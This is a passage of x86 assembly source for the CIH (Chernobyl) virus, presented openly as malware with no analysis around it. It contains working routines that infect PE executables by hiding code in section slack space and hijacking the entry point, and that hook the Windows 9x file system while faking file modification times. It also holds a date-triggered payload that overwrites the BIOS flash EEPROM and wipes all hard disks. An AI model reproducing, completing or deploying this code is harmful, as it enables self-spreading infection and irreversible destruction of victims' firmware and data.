lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
jnc short OnlySetInfectedMark
not ecx
inc ecx
cmp cx, small CodeSizeOfMergeVirusCodeSection
jb OnlySetInfectedMark
; ***************************
; * Save Original *
; * Address of Entry Point *
; ***************************
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, eax
push edx ; Pointer of File
add eax, esi
push eax ; Address of Buffer; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [eax+edi-04h]
mov [eax], ebx; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable]
mov ebp, offset VirusSize
jmp StartToWriteCodeToSections; ***************************
; * Write Code to Sections *
; ***************************LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable
mov ebx, (SizeOfRawData-@9)[edx]
sub ebx, (VirtualSize-@9)[edx]
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx
mov ebx, (PointerToRawData-@9)[edx]
add ebx, (VirtualSize-@9)[edx]
push ebx ; Pointer of File
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi]
mov [eax+4], ebx
mov ebx, [eax]
add (VirtualSize-@9)[edx], ebx

; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
sub ebp, ebx
jbe SetVirusCodeSectionTableEndMark
add edi, ebx ; Move Address of Buffer
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections; ***************************
; * Only Set Infected Mark *
; ***************************OnlySetInfectedMark:
mov esp, dr1
jmp WriteVirusCodeToFile; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************SetVirusCodeSectionTableEndMark:

; Adjust Size of Virus Section Code to Correct Value
add [eax], ebp
add [esp+08h], ebp

; Set End Mark
xor ebx, ebx
mov [eax-04h], ebx; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
lea eax, (LastVxDCallAddress-2-@9)[esi]
mov cl, VxDCallTableSize
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov [eax+2], edx
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
sub eax, edx
loop LoopOfRestoreVxDCallID; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
mov eax, dr1
mov ebx, [eax+10h]
mov edi, [eax]
LoopOfWriteVirusCodeToFile:
pop ecx
jecxz SetFileModificationMark
mov esi, ecx
mov eax, 0d601h
pop edx
pop ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************SetFileModificationMark:
pop ebx
pop eax
stc ; Enable CF(Carry Flag)
pushf; *************************************
; * Close File *
; *************************************CloseFile:
xor eax, eax
mov ah, 0d7h
call edi ; VXDCall IFSMgr_Ring0_FileIO; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
pop esi
jnc IsKillComputer; *************************************
; * Restore File Modification Time *
; *************************************
mov ebx, edi
mov ax, 4303h
mov ecx, (FileModificationTime-@7)[esi]
mov edi, (FileModificationTime+2-@7)[esi]
call ebx ; VXDCall IFSMgr_Ring0_FileIO; *************************************
; * Disable OnBusy *
; *************************************DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy; *************************************
; * Call Previous FileSystemApiHook *
; *************************************prevhook:
popad
mov eax, dr0 ;
jmp [eax] ; Jump to prevhook; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************pIFSFunc:
mov ebx, esp
push dword ptr [ebx+20h+04h+14h] ; Push pioreq
call [ebx+20h+04h] ; Call pIFSFunc
pop ecx ;
mov [ebx+1ch], eax ; Modify EAX Value in Stack; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmp dword ptr [ebx+20h+04h+04h], 00000024h
jne QuitMyVirusFileSystemHook; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
mov eax, [ecx+28h]
mov (FileModificationTime-@6)[esi], eax; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Month from BIOS CMOS
mov ax, 0708h
out 70h, al
in al, 71h
xchg ah, al

; Get Now Day from BIOS CMOS
out 70h, al
in al, 71h
xor ax, 0426h ; 04/26/????
jne DisableOnBusy
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM *
; ***************************
mov bp, 0cf8h
lea esi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
mov edi, 8000384ch
mov dx, 0cfeh
cli
call esi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
mov di, 0058h
dec edx ; and al,0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
lea ebx, EnableEEPROMToWrite-@10[esi]
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h
push ecx
loop $
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
mov eax, 0f5555h
pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
mov ah, 0e0h
mov [eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
call esi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h ; VXDCall IOS_SendCommand
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; *********************************************************
; * Static Data *
; *********************************************************
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; *********************************************************
; * Virus Version Copyright *
; *********************************************************
VirusVersionCopyright db 'CIH v'
db MajorVirusVersion+'0'
db '.'
db MinorVirusVersion+'0'
db ' TTIT; *********************************************************
; * Virus Size *
; *********************************************************VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
; * Dynamic Data *
; *********************************************************VirusGameDataStartAddress = VirusSize@6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
@7 = FileNameBuffer

DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?TimeDateStamp dd ?SymbolsPointer dd ?NumberOfSymbols dd ?SizeOfOptionalHeader dw ?_Characteristics dw ?Magic dw ?LinkerVersion dw ?SizeOfCode dd ?SizeOfInitializedData dd ?SizeOfUninitializedData dd ?AddressOfEntryPoint dd ?BaseOfCode dd ?BaseOfData dd ?ImageBase dd ?
@9 = $SectionAlignment dd ?FileAlignment dd ?OperatingSystemVersion dd ?ImageVersion dd ?SubsystemVersion dd ?Reserved dd ?SizeOfImage dd ?SizeOfHeaders dd ?SizeOfImageHeaderToRead = $-NumberOfSections

NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite = 04h

StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable+08h ; DWORD
VirtualAddress = StartOfSectionTable+0ch ; DWORD
SizeOfRawData = StartOfSectionTable+10h ; DWORD
PointerToRawData = StartOfSectionTable+14h ; DWORD
PointerToRelocations = StartOfSectionTable+18h ; DWORD
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
NumberOfRelocations = StartOfSectionTable+20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
Characteristics = StartOfSectionTable+24h ; DWORD
SizeOfScetionTable = Characteristics+04h-SectionName; *********************************************************
; * Virus Total Need Memory *
; *********************************************************VirusNeedBaseMemory = $VirusTotalNeedMemory = @9; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************VirusGame ENDS
END FileHeader